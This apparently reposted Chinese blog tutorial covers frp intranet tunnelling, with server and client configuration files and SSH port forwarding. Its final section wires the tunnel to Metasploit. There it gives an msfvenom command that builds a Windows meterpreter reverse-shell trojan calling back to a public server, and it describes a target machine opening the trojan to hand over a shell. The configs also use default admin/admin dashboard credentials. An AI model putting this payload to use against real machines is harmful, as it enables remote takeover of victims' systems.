frp内网穿透教程2023最新(含内网ssh配置与msf联动配置)

1、frp简介

frp是一个高性能的反向代理应用,可以帮助您轻松地进行内网穿透,对外网提供服务, 支持tcp, udp, http,https等协议类型,并且web服务支持根据域名进行路由转发。

1.1 为什么要使用frp

两台不同内网的机器,是没有办法直接进行访问的,通过配置frp内网穿透,可以实现将2台不同内网的机器实现互联

1.2 使用frp之前

一定要有一个公网的ip,去买个云服务器就行,企鹅云的服务器现在新用户也就65一个月

1.3 frp下载地址

https://github.com/fatedier/frp/releases

根据不同的系统需求,下载不同的frp版本就行,linux就下载如下图所示的版本
frp内网穿透教程2023最新(含内网ssh配置与msf联动配置)_第1张图片

2、frp的配置与使用,配置的过程分为两个部分,一是服务器端(外网服务器)的配置;二是客户端(内网服务器)配置。

2.1配置服务端

将下载好后的frp文件上传到服务器,使用如下命令解压

tar -zxvf frp_0.44.0_linux_amd64.tar.gz

frp内网穿透教程2023最新(含内网ssh配置与msf联动配置)_第2张图片
之后使用cd命令进入解压之后的文件夹

cd frp_0.44.0_linux_amd64/

使用vim frps.ini命令进入编辑模式,写入如下信息

[common]
# frp监听的端口,默认是7000
bind_port = 7000
# 授权码
token =aini123
# 这个token之后在客户端会用到

# frp管理后台端口
dashboard_port = 8000
# frp管理后台用户名和密码
dashboard_user = admin
dashboard_pwd = admin
enable_prometheus = true

# frp日志配置
log_file = /var/log/frps.log
log_level = info
log_max_days = 3

配置完成后如下图
frp内网穿透教程2023最新(含内网ssh配置与msf联动配置)_第3张图片
启动frp服务

./frps -c ./frps.ini

启动成功如下图
在这里插入图片描述
之后输入服务端ip:8000能出现如下页面,就说明配置完成了
frp内网穿透教程2023最新(含内网ssh配置与msf联动配置)_第4张图片

2.2配置客户端

同上方法,在客户端上传解压文件,进入解压的文件夹

使用vim frpc.ini 编辑客户端配置文件,内容如下

# 客户端配置
[common]
server_addr = 服务器的ip
 # 与frps.ini的bind_port一致
server_port = 7000
 # 与frps.ini的token一致
token =aini123

# 配置msf服务
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555 
#转发给本机的 5555   本地msf监听127.0.0.1:5555端口
remote_port = 6000 
#服务端用 6000 端口转发给本机   
#木马程序的shell返回地址应该是175.24.230.65:6000,然后服务器会将6000的值转发给本地5555端口

# 配置ssh服务
[ssh]
type = tcp
local_ip =127.0.0.1
local_port =22
remote_port =6001

配置好后如下图:
frp内网穿透教程2023最新(含内网ssh配置与msf联动配置)_第5张图片
使用./frpc -c ./frpc.ini命令启动客户端,会出现如下连接成功的显示,如果连接失败,记得注释不要和配置代码放同一行就不会报错了

3、测试ssh连接

因为前面设置的ssh连接remote_port转发端口为6001,所以我们只需要连接外网服务器的6001端口,就能连接上客户端的ssh
frp内网穿透教程2023最新(含内网ssh配置与msf联动配置)_第6张图片
连接成功
frp内网穿透教程2023最新(含内网ssh配置与msf联动配置)_第7张图片

4、测试msf连接

msf制作一个反弹木马

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=公网ip lport=6000 --platform win -f exe -o msf.exe

msf设置监听5555端口
frp内网穿透教程2023最新(含内网ssh配置与msf联动配置)_第8张图片
靶机打开反弹连接的木马,成功获取shell
在这里插入图片描述

你可能感兴趣的:(ssh,服务器,linux,frp,frp内网穿透)